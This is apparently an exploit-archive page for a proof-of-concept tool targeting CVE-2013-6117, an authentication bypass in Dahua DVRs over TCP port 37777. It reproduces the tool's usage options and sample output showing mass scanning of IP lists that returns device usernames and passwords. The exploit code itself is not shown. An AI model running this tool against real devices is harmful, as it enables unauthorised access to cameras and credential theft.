CVE-2013-6117 PoC — Dahua Security DVR Appliances 身份验证绕过漏洞

Source

https://github.com/milo2012/CVE-2013-6117

Associated Vulnerability

Title:Dahua Security DVR Appliances 身份验证绕过漏洞 (CVE-2013-6117)
Description:Dahua DVR是中国大华（Dahua）公司的硬盘录像机产品。 Dahua DVR 2.608.0000.0和2.608.GV00.0版本中存在安全漏洞。远程攻击者可通过向TCP 37777端口发送请求利用该漏洞绕过身份验证，获取敏感信息，更改用户密码，清除日志文件，执行其他恶意操作。

Description

CVE-2013-6117

Readme

**CVE-2013-6117**
   
```
$ ./CVE-2013-6117 -h
Options:

  -h, --help       display help information
  -f, --filename   File containing list of IP addresses
  -t, --target     Target IP
  -n, --threads    No of concurrent threads (default: 100)
```
   
```
$ ./CVE-2013-6117 -f hostfile.txt 
1.2.4.4|name.no-ip.org:80|username|password
```
  
```
$ ./CVE-2013-6117 -t 1.2.3.4
1.2.4.4|name.no-ip.org:80|username|password
```
  
Reference:  
https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117  
https://www.exploit-db.com/exploits/29673/

File Snapshot


 [4.0K]  /data/pocs/24bd0fce5c1098f7676b81cb3ad794da0ab381a8
├── [3.5K]  CVE-2013-6117.go
├── [ 212]  goreleaser.yml
└── [ 564]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!